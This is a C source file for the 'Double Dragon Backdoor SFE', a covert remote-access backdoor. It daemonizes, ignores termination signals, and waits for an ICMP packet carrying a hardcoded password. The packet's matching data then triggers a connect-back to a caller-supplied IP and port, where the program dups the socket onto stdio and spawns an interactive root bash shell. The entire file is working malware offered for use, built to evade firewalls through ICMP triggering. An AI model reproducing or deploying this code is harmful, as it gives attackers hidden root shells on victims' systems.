ranzou-sfe.c

1. /*
2.          Double Dragon Backdoor SFE (Special Firewall Edition)
3.                 by tHE rECIdjVO <recidjvo@pkcrew.org>
4.  
5.                    Member of the Packet Knights Crew
6.                         http://www.pkcrew.org/
7.  
8.                         ---> Player 1: Ranzou
9.                                                                 */
10.  
11. #define PASSWD "passwd"
12. #define USER "root"
13.  
14. #define PROGRAM "Double Dragon Backdoor SFE (Special Firewall Edition)"
15. #define AUTHOR "tHE rECIdjVO <recidjvo@pkcrew.org>"
16.  
17. #include <stdio.h>
18. #include <stdlib.h>
19. #include <string.h>
20. #include <signal.h>
21. #include <pwd.h>
22. #include <unistd.h>
23. #include <netdb.h>
24. #include <sys/socket.h>
25. #include <sys/types.h>
26. #include <netinet/in.h>
27. #include <netinet/ip.h>
28. #include <netinet/ip_icmp.h>
29. #include <grp.h>
30.  
31. // Data to receive
32. struct cb_data{
33.     char pass[30];
34.     u_long jimmy_ip;
35.     u_short jimmy_port;
36. };
37.  
38. int main(int argc, char *argv[]);
39. void wait_icmp(void);
40. void callback(u_long jimmyip, int jimmyport);
41.  
42. int main(int argc, char *argv[])
43. {
44.     // Signal handling
45.     signal(SIGINT, SIG_IGN);
46.     signal(SIGHUP, SIG_IGN);
47.     signal(SIGTERM, SIG_IGN);
48.  
49.     // Going in the background
50.     if(fork() == 0) {
51.         setsid();
52.         wait_icmp();
53.     }
54.     exit(0);
55. }
56.  
57. void callback(u_long jimmyip, int jimmyport)
58. {
59.     int jsock, jconn;
60.     struct sockaddr_in jaddr;
61.     struct passwd *userent;
62.     gid_t groups[1];
63.  
64.     setsid();
65.     // Connect to the caller host
66.     if((jsock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
67.         exit(1);
68.     }
69.  
70.     jaddr.sin_family = AF_INET;
71.     jaddr.sin_addr.s_addr = inet_addr(inet_ntoa(jimmyip));
72.     jaddr.sin_port = htons(jimmyport);
73.  
74.     sleep(2);
75.     if(connect(jsock, &jaddr, sizeof(jaddr)) < 0) {
76.         exit(2);
77.     }
78.  
79.     // Dup socket
80.     dup2(jsock, 0);
81.     dup2(jsock, 1);
82.     dup2(jsock, 2);
83.  
84.     // Read user data and set privileges
85.     if((userent = getpwnam(USER)) == NULL) {
86.         userent = getpwnam("root");
87.     }
88.     initgroups(userent->pw_name, userent->pw_gid);
89.     setgid(userent->pw_gid);
90.     setuid(userent->pw_uid);
91.  
92.     // Run the shell
93.     printf("\n\n\t" PROGRAM "\n\t\tby " AUTHOR "\n\nWelcome, you are now ");
94.     fflush(stdout);
95.     system("whoami");
96.     execl("/bin/bash", "/bin/bash", "-noprofile", "-norc", "-i", 0);
97.     close(jsock);
98.     exit(0);
99. }
100.  
101. void wait_icmp(void)
102. {
103.         char *packet;
104.         struct ip *pip;
105.         struct icmp *picmp;
106.     struct cb_data *pdata;
107.         int sock, strlen, hincl = 1;
108.         struct sockaddr_in from;
109.  
110.     // Create socket to receive ICMP data
111.         if((sock = socket(AF_INET, SOCK_RAW, 1)) < 0) {
112.         exit(1);
113.         }
114.         packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + 64);
115.         pip = (struct ip *)packet;
116.         picmp = (struct icmp *)(packet + sizeof(struct ip));
117.         pdata = (struct cb_data *)(packet + sizeof(struct ip) + sizeof(struct icmp));
118.         memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + 64);
119.  
120.     strlen = sizeof(from);
121.     while(1) {
122.         // Read each ICMP packet searching for a matching passwd
123.             recvfrom(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + 64, 0, (struct sockaddr *)&from, &strlen);
124.         if(strncmp(PASSWD, pdata->pass, sizeof(PASSWD)) == 0) {
125.             if(fork() != 0) {
126.                 // Start the callback
127.                 callback(pdata->jimmy_ip, pdata->jimmy_port);
128.             }  
129.         }
130.     }
131. }